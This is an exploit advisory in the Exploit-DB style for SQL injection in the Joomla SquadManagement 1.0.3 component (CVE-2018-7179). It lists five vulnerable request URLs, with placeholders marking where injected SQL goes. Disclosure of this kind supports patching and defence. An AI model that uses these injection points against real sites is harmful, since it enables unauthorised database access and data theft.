# # # # # # Exploit Title: Joomla! Component SquadManagement 1.0.3 - SQL Injection # Dork: N/A # Date: 16.02.2018 # Vendor Homepage: http://www.larshildebrandt.de/ # Software Link: https://extensions.joomla.org/extensions/extension/sports-a-games/sports/squadmanagement/ # Software Download: http://www.larshildebrandt.de/joomla/download/squadmanagement.html?download=91:squadmanagement-1-0-3 # Version: 1.0.3 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-7179 # # # # # # Exploit Author: Ihsan Sencan # # # # # # # POC: # # 1) # http://localhost/[PATH]/index.php?option=com_squadmanagement&task=removewarround&id=[SQL] # # 2) # http://localhost/[PATH]/index.php?option=com_squadmanagement&controller=appointment&task=deleteappointment&id=[SQL] # # 3) # http://localhost/[PATH]/index.php?option=com_squadmanagement&controller=appointment&task=removefromappointment&id=[SQL] # # 4) # http://localhost/[PATH]/index.php?option=com_squadmanagement&view=editsquad&format=memberlist&squadid=[SQL] # # 5) # http://localhost/[PATH]/index.php?option=com_squadmanagement&controller=squadmembers&task=addmember&squadid=[SQL] # # # # # #